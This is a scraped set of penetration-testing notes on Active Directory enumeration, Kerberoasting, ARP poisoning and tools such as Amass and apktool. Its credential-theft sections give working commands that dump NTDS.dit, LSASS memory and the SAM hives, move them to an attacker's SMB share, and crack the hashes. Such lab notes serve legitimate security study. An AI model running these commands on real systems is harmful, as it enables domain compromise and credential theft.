    We can also open the MMC Console from a non-domain joined computer using the following command syntax (See here how to deal with following steps the MMC interface):

    runas /netonly /user:Domain_Name\\Domain_USER mmc\n

Also, NT Authority/System is a built-in LocalSystem account in Windows operating systems, used by the service control manager. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting (see techniques to gain SYSTEM-level access on a host).
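
As an illustrative sketch, one common way to get a SYSTEM shell from an elevated prompt is Sysinternals PsExec:

# Spawn an interactive cmd.exe as NT AUTHORITY\\SYSTEM (run from an elevated prompt)\nPsExec.exe -i -s cmd.exe\n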

    Enumerating with powerview.ps1

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#3-domain-group-information","title":"3. Domain Group Information","text":"
    # Get all administrative groups \nGet-ADGroup -Filter \"adminCount -eq 1\" \\| select Name\n\n# LDAP query to return all AD groups\nGet-ADObject -LDAPFilter '(objectClass=group)' \\| select cn\n\n# Get AD groups using WMI \nGet-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\"\n\n# Get information about an specific AD group\nGet-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

    Domain Groups of interest:

    Get-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

    These are some groups with special permissions that, if missconfigured, might be exploited:

    # Schema Admins | The Schema Admins group is a high privileged group in a forest root domain. The membership of this group must be limited. This group is use to modify the schema of forest. Additional accounts must only be added when changes to the schema are necessary and then must be removed. By default, the Administrator account is a member of this group. Because this group has significant power in the forest, add users with caution. Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.\nGet-ADGroup -Identity \"Schema Admins\" -Properties *\n\n# Default Administrators | Domain Admins and Enterprise Admins \"super\" groups. A built-in group . Grants complete and unrestricted access to the computer, or if the computer is promoted to a domain controller, members have unrestricted access to the domain. This group cannot be renamed, deleted, or moved. This built-in group controls access to all the domain controllers in its domain, and it can change the membership of all administrative groups. Membership can be modified by members of the following groups: the default service Administrators, Domain Admins in the domain, or Enterprise Admins.\nGet-ADGroup -Identity \"Administrators\" -Properties *\n\n# Server Operators | A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. Members can modify services, access SMB shares, and backup files. \nGet-ADGroup -Identity \"Server Operators\" -Properties *\n\n# Backup Operators | A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down. Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs. \nGet-ADGroup -Identity \"Backup Operators\" -Properties *\n\n# Print Operators | A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues. They can also manage Active Directory printer objects in the domain. Members of this group can locally sign in to and shut down domain controllers in the domain. Because members of this group can load and unload device drivers on all domain controllers in the domain, add users with caution. This group cannot be renamed, deleted, or moved. Members are allowed to logon to DCs locally and \"trick\" Windows into loading a malicious driver. \nGet-ADGroup -Identity \"Print Operators\" -Properties *\n\n# Hyper-V Administrators | Members of the Hyper-V Administrators group have complete and unrestricted access to all the features in Hyper-V. Adding members to this group helps reduce the number of members required in the Administrators group, and further separates access. 
If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.\nGet-ADGroup -Identity \"Hyper-V Administrators\" -Properties *\n\n# Account Operators | Grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers. Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights. Members can modify non-protected accounts and groups in the domain. \nGet-ADGroup -Identity \"Account Operators\" -Properties *\n\n# Remote Desktop Users | The Remote Desktop Users group on an RD Session Host server is used to grant users and groups permissions to remotely connect to an RD Session Host server. This group cannot be renamed, deleted, or moved. It appears as a SID until the domain controller is made the primary domain controller and it holds the operations master role (also known as flexible single master operations or FSMO). Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.\nGet-ADGroup -Identity \"Remote Desktop Users\" -Properties *\n\n# Remote Management Users | Members of the Remote Management Users group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. The Remote Management Users group is generally used to allow users to manage servers through the Server Manager console, whereas the WinRMRemoteWMIUsers_ group is allows remotely running Windows PowerShell commands. Members are allowed to logon to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs). \nGet-ADGroup -Identity \"Remote Management Users\" -Properties *\n\n# Group Policy Creator Owners | A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator. The default owner of a new Group Policy object is usually the user who created it. If the user is a member of Administrators or Domain Admins, all objects that are created by the user are owned by the group. Owners have full control of the objects they own. Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.\nGet-ADGroup -Identity \"Group Policy Creator Owners\" -Properties *\n\n# DNSAdmins | Members of this group have administrative access to the DNS Server service. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group has no default members. Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.\nGet-ADGroup -Identity \"DNSAdmins\" -Properties *\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#4-default-domain-policy","title":"4. Default Domain Policy","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#5-domain-functional-levels","title":"5. Domain Functional Levels","text":"
# Get hostnames with the word \"SQL\" in their hostname\nGet-ADComputer -Filter \"DNSHostName -like 'SQL*'\"\n

    6. Password Policy

    7. Group Policy Objects (GPOs)

    8. Kerberos Delegation

    # Find admin users that don't require Kerberos Pre-Auth\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n

    9. Domain Trusts

    10. Access Control Lists (ACLs)

    #  Enumerate UAC values for admin users\nGet-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol \n

    11. Remote access rights

Active Directory is easy to misconfigure. These are common attacks:

    • Kerberoasting / ASREPRoasting
    • NTLM Relaying
    • Network traffic poisoning
    • Password spraying
    • Kerberos delegation abuse
    • Domain trust abuse
    • Credential theft
    • Object control
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#cheat-sheet-so-far","title":"Cheat sheet so far","text":"Command Description xfreerdp /v:$ip /u:htb-student /p:<password> RDP to lab target Get-ADGroup -Identity \"<GROUP NAME\"> -Properties * Get information about an AD group whoami /priv View a user's current rights Get-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State Check if RSAT tools are installed Get-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online Install all RSAT tools runas /netonly /user:htb.local\\jackie.may powershell Run a utility as another user Get-ADObject -LDAPFilter '(objectClass=group)' \\| select cn LDAP query to return all AD groups Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' \\| select name List disabled users (Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count Count all users in an OU get-ciminstance win32_product \\| fl Query for installed software Get-ADComputer -Filter \"DNSHostName -like 'SQL*'\" Get hostnames with the word \"SQL\" in their hostname Get-ADGroup -Filter \"adminCount -eq 1\" \\| select Name Get all administrative groups Get-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'} Find admin users that don't require Kerberos Pre-Auth Get-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol Enumerate UAC values for admin users Get-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\" Get AD groups using WMI ([adsisearcher]\"(&(objectClass=Computer))\").FindAll() Use ADSI to search for all computers","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#acronyms","title":"Acronyms","text":"

    ADSI

    Active Directory Service Interfaces (ADSI) is a set of COM interfaces used to access the features of directory services from different network providers. ADSI is used in a distributed computing environment to present a single set of directory service interfaces for managing network resources. Administrators and developers can use ADSI services to enumerate and manage the resources in a directory service, no matter which network environment contains the resource. ADSI enables common administrative tasks, such as adding new users, managing printers, and locating resources in a distributed computing environment.

    CIM The Common Information Model (CIM) is the Distributed Management Task Force (DMTF) standard [DSP0004] for describing the structure and behavior of managed resources such as storage, network, or software components. One way to describe CIM is to say that it allows multiple parties to exchange management information about these managed elements. However, this falls short of fully capturing CIM's ability not only to describe these managed elements and the management information, but also to actively control and manage them. By using a common model of information, management software can be written once and work with many implementations of the common model without complex and costly conversion operations or loss of information.

    DIT Directory Information Tree.

    MMC You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

    OU

    An OU is a container within a Microsoft Windows Active Directory (AD) domain that can hold users, groups, and computers. It is the smallest unit to which an administrator can assign Group Policy settings or account permissions.

    RSAT

    The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

    SID

    In the context of the Microsoft Windows NT line of operating systems, a Security Identifier is a unique, immutable identifier of a user, user group, or other security principal.

    SPN

    A service principal name (SPN) is a unique identifier of a service instance. Kerberos authentication uses SPNs to associate a service instance with a service sign-in account. Doing so allows a client application to request service authentication for an account even if the client doesn't have the account name.
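    In practice, SPNs matter because accounts with an SPN set can be Kerberoasted. A hedged sketch from a Linux attack box using Impacket's GetUserSPNs.py (the domain, credentials, and $ip are placeholders):

    # Request TGS tickets for SPN-enabled accounts and print hashes crackable with hashcat\nGetUserSPNs.py INLANEFREIGHT.LOCAL/username:password -dc-ip $ip -request\n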

    UAC

    User Account Control (UAC) is a fundamental component of Microsoft's overall security vision. UAC helps mitigate the impact of malware.

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#attacking-active-directory","title":"Attacking Active Directory","text":"

    Once a Windows system is joined to a domain, it will no longer default to referencing the SAM database to validate logon requests. That domain-joined system will now send all authentication requests to be validated by the domain controller before allowing a user to log on.

    If needed, use tools like Username Anarchy to create a list of usernames.
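    A hedged usage sketch of Username Anarchy, assuming it has been cloned from its GitHub repository and is fed a file of full names (the file names are placeholders):

    # Generate candidate usernames (jsmith, j.smith, john.smith, ...) from full names\n./username-anarchy --input-file full-names.txt > usernames.txt\n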

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-dumping-ntdsdit","title":"1. Dumping ntds.dit","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumping-ntdsdit-locally","title":"Dumping ntds.dit locally","text":"

    NT Directory Services (NTDS) is the directory service used with AD to find & organize network resources. Recall that the NTDS.dit file is stored at %systemroot%\\NTDS on the domain controllers in a forest.

    The .dit stands for directory information tree. This is the primary database file associated with AD and stores all domain usernames, password hashes, and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain.

    # Connect to a DC with Evil-WinRM\nevil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'\n\n# To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights. Check Local Group Membership:\n*Evil-WinRM* PS C:\\> net localgroup\n\n# Check User Account Privileges including Domain. If the account has both Administrators and Domain Administrator rights, this means we can do just about anything we want, including making a copy of the NTDS.dit file.\nnet user <username>\n\n# Use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. Create a Shadow Copy of C:\n*Evil-WinRM* PS C:\\> vssadmin CREATE SHADOW /For=C:\n\n# Copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.\n*Evil-WinRM* PS C:\\NTDS> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit\n

    Launch smbserver in our attacker machine:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

    Now, from PS in the victim's windows machine:

    # Transfer the file to attacker machine\ncmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

    And... crack the hash with hashcat:

    sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumpins-ntdsdit-remotely","title":"Dumpins ntds.dit remotely","text":"
    crackmapexec smb $ip -u <username> -p <password> --ntds\n
    ","tags":["active directory","ldap","windows"]},{"location":"activedirectory-powershell-module/","title":"The ActiveDirectory PowerShell module","text":"

    The Active Directory module for Windows PowerShell is a PowerShell module that consolidates a group of cmdlets. You can use these cmdlets to manage your Active Directory domains, Active Directory Lightweight Directory Services (AD LDS) configuration sets, and Active Directory Database Mounting Tool instances in a single, self-contained package.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#installation","title":"Installation","text":"

    Download from The ActiveDirectory PowerShell module github repository

    This module is Microsoft signed and works even in PowerShell Constrained Language Mode (CLM).

    Import-Module .\\ADModule-master\\Microsoft.ActiveDirectory.Management.dll\n\nImport-Module .\\ADModule-master\\ActiveDirectory\\ActiveDirectory.psd1\n

    Also, you can copy the DLL from the github repo to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges.

    Import-Module C:\\ADModule\\Microsoft.ActiveDirectory.Management.dll -Verbose\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#basic-commands","title":"Basic commands","text":"
    # Get ACL for a folder (or a file)\nGet-ACL \"C:\\Users\\Public\\Desktop\"\n\n# Search for AD elements. [See more in ldap queries](ldap.md)\nGet-ADObject -LDAPFilter <thespecificfilter>\n\n# Count occurrences in a query, like the one above.\n(Get-ADObject -LDAPFilter <thespecificfilter>).count\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-aduser","title":"Get-ADUser","text":"

    More on https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps.

    # This command gets all users in the container OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM.\nGet-ADUser -Filter * -SearchBase \"OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM\"\n\n# This command gets all users that have a name that ends with SvcAccount:\nGet-ADUser -Filter 'Name -like \"*SvcAccount\"' | Format-Table Name,SamAccountName -A\n\n# This command gets all of the properties of the user with the SAM account name ChewDavid:\nGet-ADUser -Identity ChewDavid -Properties *\n\n# This command gets the user with the name ChewDavid in the Active Directory Lightweight Directory Services (AD LDS) instance:\nGet-ADUser -Filter \"Name -eq 'ChewDavid'\" -SearchBase \"DC=AppNC\" -Properties \"mail\" -Server lds.Fabrikam.com:50000\n\n# This command gets all enabled user accounts in Active Directory using an LDAP filter:\nGet-ADUser -LDAPFilter '(!userAccountControl:1.2.840.113556.1.4.803:=2)'\n\n# search for all administrative users with the `DoesNotRequirePreAuth` attribute set, meaning that they can be ASREPRoasted:\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n\n# Find all administrative users with the SPN \"servicePrincipalName\" attribute set, meaning that they can likely be subject to a Kerberoasting attack\nGet-ADUser -Filter \"adminCount -eq '1'\" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adcomputer","title":"Get-ADComputer","text":"
    # Search domain computers for interesting hostnames. SQL servers are a particularly juicy target on internal assessments. The below command searches all hosts in the domain using `Get-ADComputer`, filtering on the `DNSHostName` property that contains the word `SQL`\nGet-ADComputer  -Filter \"DNSHostName -like 'SQL*'\"\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adgroup","title":"Get-ADGroup","text":"
    # Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it's protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. \nGet-ADGroup -Filter \"adminCount -eq 1\" | select Name\n
    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adobject","title":"Get-ADObject","text":"","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"amass/","title":"Amass","text":"

    In-depth DNS enumeration and network mapping. Amass combines active and passive fingerprinting, so being conscious of which mode you are running is really important. It's an assessment tool with reporting features.

    ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#install","title":"Install","text":"
    apt install snapd\nservice snapd start\nsnap install amass\n

    Before diving into using Amass, we should make the most of it by adding API keys to it.

    1. First, we can see which data sources are available for Amass (paid and free) by running:

    amass enum -list \n

    2. Next, we will need to create a config file to add our API keys to.

    sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

    3. Now, open the file ~/.config/amass/config.ini and register for as many services as you can. Once you have obtained your API ID and secret, edit the config.ini file and add the credentials to it.

    sudo nano ~/.config/amass/config.ini\n

    4. Now, edit the file to add the sources. It is recommended to add:

    • censys.io: takes the guesswork out of understanding and protecting your organization's digital footprint.
    • https://asnlookup.com: quickly look up updated information about a specific Autonomous System Number (ASN), organization, CIDR, or registered IP addresses (IPv4 and IPv6), among other relevant data. Free and paid API access is offered.
    • https://otx.alienvault.com: quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security, among others.
    • https://bigdatacloud.com
    • https://cloudflare.com
    • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager
    • https://fullhunt.io
    • https://github.com
    • https://ipdata.co
    • https://leakix.net
    • as many more as you can.

    5. When ready, we can run amass:

    ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#basic-usage","title":"Basic usage","text":"
    amass enum -active -d crapi.apisec.ai  -ip -brute -dir path/to/save/results/\n# enum: Perform ACTIVE enumerations and network mapping\n# -ip: Show IP addresses of cached subdomains.\n# -brute: Perform a brute force dns attack.\n\namass enum -passive -d crapi.apisec.ai -src  -dir path/to/save/results/\n# enum: Perform PASSIVE enumerations and network mapping.\n# src: display sources of the host domain.\n# -dir: Specify a folder to save results.\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumerations. Passive fingerprinting.\n

    Some flags:

    -active: Attempt zone transfer and certificate name grabs.\n-passive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: to specify a domain\n-ip: Show IP addresses of cached subdomains.\n--include-unresolvable: output DNS names that did not resolve.\n-o file.txt: To output the result into a file\n-w: path to a different wordlist file\n

    Also, to be more precise:

    amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

    Amass has several useful command-line options. Use the intel command to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses:

    amass intel -addr [target IP addresses]\n

    If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

    amass intel -d [target domain] -whois\n

    This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

    amass enum -passive -d [target domain]\n

    The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

    amass enum -active -d [target domain]\n

    To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

    amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
    ","tags":["dns enumeration","enumeration","tools"]},{"location":"android-debug-bridge/","title":"Android Debug Bridge - ADB","text":"

    ADB or Android Debug Bridge is a command-line tool developed to facilitate communication between a computer and a connected emulator or Android device. ADB works with the aid of three components called Client, Daemon, and Server.

    • Client: the computer on which you use a command-line terminal to issue ADB commands.
    • Daemon: ADBD is a background process that runs on the connected emulator or Android device and executes the commands it receives.
    • Server: runs in the background on the computer and manages communication between the client and the daemon.
    ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#basic-commands","title":"Basic commands","text":"
    # Activate remote shell command console on the connected Android smartphone or tablet.\nadb shell\n\n# List Android devices (and emulators) connected to your computer\nadb devices\n# -l: list devices by model or product number\n\n# Connect to a device over the network\nadb connect <device_ip>:5555\n\n# Remove a package (from within adb shell)\npm uninstall --user 0 com.package.name\n\n# Remove a package but leave app data \npm uninstall -k --user 0 com.package.name\n# -k: Keep the app data and cache after package removal\n\n# Reinstall an uninstalled system app\ncmd package install-existing com.package.name\n
    ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#howtos","title":"Howtos","text":"
    • Remove bloatware from android device.
    ","tags":["mobile pentesting"]},{"location":"apktool/","title":"apktool","text":"","tags":["mobile pentesting","tools"]},{"location":"apktool/#installation","title":"Installation","text":"

    Go to your tool folder and download the tool:

    wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.6.0.jar\n

    Have the device from genymotion already running on Host-Only mode + NAT.

    Have your kali on Host-Only mode + NAT.

    Run:

    adb connect <the device Host-Only IP>:5555\n\n# Making sure that genymotion is not using a proxy:\nadb shell settings put global http_proxy :0\n\n# Installing the app\nadb install nameOfApp\n

    To decompile and see source code:

    java -jar apktool_2.6.0.jar d -s nameOfApp\n# d: decompile\n# -s: do not decode sources (keeps classes.dex intact)\n

    When decompiled, a folder is created. If you go into the folder you will see the file classes.dex, which contains the source code. To see it:

    jadx-gui\n
    ","tags":["mobile pentesting","tools"]},{"location":"apt-packet-manager/","title":"Package Manager (APT)","text":"
    # Search for a package or text string:\napt search <text_string>\n\n# Show package information:\napt show <package>\n\n# Show package dependencies:\napt depends <package>\n\n# Show the names of all the packages installed in the system:\napt list --installed\n\n# Install a package:\napt install <package>\n\n# Uninstall a package:\napt remove <package>\n\n# Delete a package including its configuration files:\napt purge <package>\n\n# Delete automatically those packages that are not being used (be careful with this command, due to apt's dependency hell it may delete unwanted packages):\napt autoremove\n\n# Update the repositories information:\napt update\n\n# Update a package to the last available version in the repository:\napt upgrade <package>\n\n# Update the full distribution. It will update our system to the next available version:\napt full-upgrade\n\n# Clean caches, downloaded packages, etc:\napt clean && apt autoclean\n
    ","tags":["bash"]},{"location":"aquatone/","title":"Aquatone - Automatize web scanner in large subdomain lists","text":"

    Aquatone is a tool for automatic and visual inspection of websites across many hosts and is convenient for quickly gaining an overview of HTTP-based attack surfaces by scanning a list of configurable ports, visiting the website with a headless Chrome browser, and taking a screenshot. This is helpful, especially when dealing with huge subdomain lists.

    sudo apt install golang chromium-driver\n\ngo get github.com/michenriksen/aquatone\n\nexport PATH=\"$PATH\":\"$HOME/go/bin\"\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"aquatone/#basic-usage","title":"Basic usage","text":"
    cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
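    Aquatone can also ingest nmap or masscan XML output instead of a plain host list; a hedged example (scan.xml is a placeholder):

    cat scan.xml | aquatone -nmap\n# -nmap: parse the piped input as nmap/masscan XML\n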
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"arjun/","title":"Arjun","text":"","tags":["api","tools"]},{"location":"arjun/#installation","title":"Installation","text":"
    sudo git clone https://github.com/s0md3v/Arjun.git\n

    Other ways:

    pip3 install arjun\n
    ","tags":["api","tools"]},{"location":"arjun/#basic-commands","title":"Basic commands","text":"
    # Run arjun against a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun$}' --stable\n# -m Get method parameters GET/POST/JSON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

    Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

    ","tags":["api","tools"]},{"location":"arp-poisoning/","title":"Arp poisoning","text":"

    This attack is performed by sending gratuitous ARP replies.

    ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arp-poisoning/#intercepting-smb-traffic","title":"Intercepting SMB traffic","text":"

    We'll be using the arpspoof tool, included in dsniff.

    ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arpspoof-dniff/","title":"arpspoof from dniff","text":"

    dsniff is a collection of tools for network auditing and penetration testing. It includes arpspoof, a utility designed to intercept traffic on a switched LAN.

    Before running, enable Linux kernel IP forwarding (this turns the Linux box into a router).

    echo 1 > /proc/sys/net/ipv4/ip_forward\n

    And then, run arpspoof:

    arpspoof -i <interface> -t $ip -r <host IP>\n# interface: NIC you want to use (like eth0 for your local LAN, or tap0 for Hera Lab)\n# target IP: one of the victim addresses\n# host IP: the other victim address (e.g., the gateway); traffic is intercepted in both directions.\n

    After that, run Wireshark to intercept the traffic.

    • SMB traffic. When capturing smb traffic in wireshark, go to: FILE>Export Objects>SMB/SMB2. There you have all files uploaded or downloaded from a server during a SMB capture session.
    • Telnet traffic: Telnet sends characters one by one, which is why you don't see the username/password straight away. But with \"Follow TCP Stream\", Wireshark will put all the data together and you will be able to see the username/password. Just right-click on a packet of the telnet session and choose \"Follow TCP Stream\".
    ","tags":["windows","tools"]},{"location":"attacking-lsass/","title":"Attacking LSASS","text":"

    See Windows credentials storage.

    "},{"location":"attacking-lsass/#dumping-lsass-process-memory","title":"Dumping LSASS Process Memory","text":"

    There are several methods to dump LSASS process memory.

    "},{"location":"attacking-lsass/#1-task-manager-method","title":"1. Task manager method","text":"

    Open Task Manager. In the Processes tab, search for Local Security Authority Process. Right-click it and select Create dump file. A file called lsass.DMP is created and saved in:

    C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp\n

    Transfer file to attacking machine.
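    One hedged way to do the transfer, reusing the Impacket smbserver share pattern shown elsewhere in these notes (the share name and paths are placeholders):

    # On the attacker machine: expose a share named CompData\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n\n# On the victim (cmd): move the dump onto the share\nmove C:\\Users\\<user>\\AppData\\Local\\Temp\\lsass.DMP \\\\<attacker_ip>\\CompData\n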

    "},{"location":"attacking-lsass/#rundll32exe-comsvcsdll-method","title":"Rundll32.exe & Comsvcs.dll method","text":"

    Modern anti-virus tools recognize this method as malicious activity.

    # Finding LSASS PID in cmd\ntasklist /svc\n\n# Finding LSASS PID in PowerShell\nGet-Process lsass\n\n# Creating lsass.dmp using PowerShell\nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump <PID> C:\\lsass.dmp full\n# With this command, we are running rundll32.exe to call an exported function of comsvcs.dll which also calls the MiniDumpWriteDump (MiniDump) function to dump the LSASS process memory to a specified directory (C:\\lsass.dmp). \n

    Transfer file to attacking machine.

    "},{"location":"attacking-lsass/#3-pypykatz","title":"3. Pypykatz","text":"

    pypykatz parses the secrets hidden in the LSASS process memory dump.

    pypykatz lsa minidump /home/path/lsass.dmp \n
    "},{"location":"attacking-lsass/#crack-the-file","title":"Crack the file","text":""},{"location":"attacking-lsass/#cracking-the-nt-hash-with-hashcat","title":"Cracking the NT Hash with Hashcat","text":"
    sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
    "},{"location":"attacking-sam/","title":"Attacking SAM","text":"

    See Windows credentials storage.

    "},{"location":"attacking-sam/#dumping-sam-locally","title":"Dumping SAM Locally","text":""},{"location":"attacking-sam/#1-copying-sam-registry-hives","title":"1. Copying SAM Registry Hives","text":"

    There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes.

    Registry Hive Description hklm\\sam Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. hklm\\system Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database. hklm\\security Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

    Launching CMD as an admin will allow us to run reg.exe to save copies of the registry hives.

    reg.exe save hklm\\sam C:\\sam.save\n\nreg.exe save hklm\\system C:\\system.save\n\nreg.exe save hklm\\security C:\\security.save\n

    Transfer the registry hives to our attacker machine, for instance, with smbserver.py from impacket.

    # From the attacker machine (our kali) all we must do to create the share is run smbserver.py -smb2support using python, give the share a name (CompData) and specify the directory to share\n#########################################\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/\n\n# From the victim's machine (windows)\n#########################################\nmove sam.save \\\\$ipAttacker\\CompData\nmove system.save \\\\$ipAttacker\\CompData\nmove security.save \\\\$ipAttacker\\CompData\n
    "},{"location":"attacking-sam/#2-dumping-hashes-with-impackets-secretsdumppy","title":"2. Dumping Hashes with Impacket's secretsdump.py","text":"
    locate secretsdump \n
    python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n

    Secretsdump dumps the local SAM hashes and would've also dumped the cached domain logon information if the target was domain-joined and had cached credentials present in hklm\\security.

